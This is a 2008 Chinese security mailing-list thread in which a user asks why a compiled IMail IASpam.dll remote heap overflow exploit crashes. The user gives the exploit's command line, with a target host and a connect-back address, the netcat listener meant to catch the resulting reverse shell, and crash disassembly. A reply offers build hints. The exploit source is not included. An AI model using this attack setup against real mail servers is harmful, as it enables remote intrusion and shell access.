我看了三遍才看明白你的意思,你是说你运行的exp挂掉了吧?
我是在xp sp2上 vc 6.0 环境下写的,你试试找别人帮你编译个看 [Ph4nt0m] <http://www.ph4nt0m.org/> [Ph4nt0m Security Team] <http://blog.ph4nt0m.org/> [EMAIL PROTECTED] Email: [EMAIL PROTECTED] PingMe: <http://cn.pingme.messenger.yahoo.com/webchat/ajax_webchat.php?yid=hanqin_wu hq&sig=9ae1bbb1ae99009d8859e88e899ab2d1c2a17724> === V3ry G00d, V3ry Str0ng === === Ultim4te H4cking === === XPLOITZ ! === === #_# === #If you brave,there is nothing you cannot achieve.# _____ 发件人: [email protected] [mailto:[EMAIL PROTECTED] 代表 netcicala 发送时间: 2008年5月29日 13:43 收件人: ph4nt0m 主题: [Ph4nt0m] 关于imail 溢出。 在幻影BLOG上看到一篇关于IMAIL漏洞测试文章,编译PASS。文章地址: http://pstgroup.blogspot.com/2007/09/exploitimail-iaspamdll-80x-remote-heap. html# 运行程序语法如下: imail 192.168.112.2 25 192.168.0.19 4445. 本地用nc -vv -l 4445. 但执行操作imail时候的时候遇到如下报错 AppName: imail.exe AppVer: 0.0.0.0 ModName: imail.exe ModVer: 0.0.0.0 Offset: 0000106a 进入调试模式,来到了00401068A处。停在mov cl, byte ptr [esi]语句了。 0040105D 81C6 80000000 add esi, 80 00401063 33C9 xor ecx, ecx 00401065 83C4 04 add esp, 4 00401068 8907 mov dword ptr [edi], eax 0040106A 8A0E mov cl, byte ptr [esi] 0040106C 43 inc ebx 0040106D 83C7 04 add edi, 4 00401070 81F9 E8D24000 cmp ecx, 0040D2E8 00401076 8BC6 mov eax, esi 我的环境是WINXP+SP3 。 目标ip是imail v8.01 win2003server 版服务器。 请高手看一下问题出在哪里。 -- =====END===== _____ 尽享江北城市荣光,开启滨江世界岸区, <http://popme.163.com/link/003982_0526_7909.html> 东海岸赠空间近50%</a --~--~---------~--~----~------------~-------~--~----~ 要向邮件组发送邮件,请发到 [email protected] 要退订此邮件,请发邮件至 [EMAIL PROTECTED] -~----------~----~----~----~------~----~------~--~---
<<inline: image001.gif>>
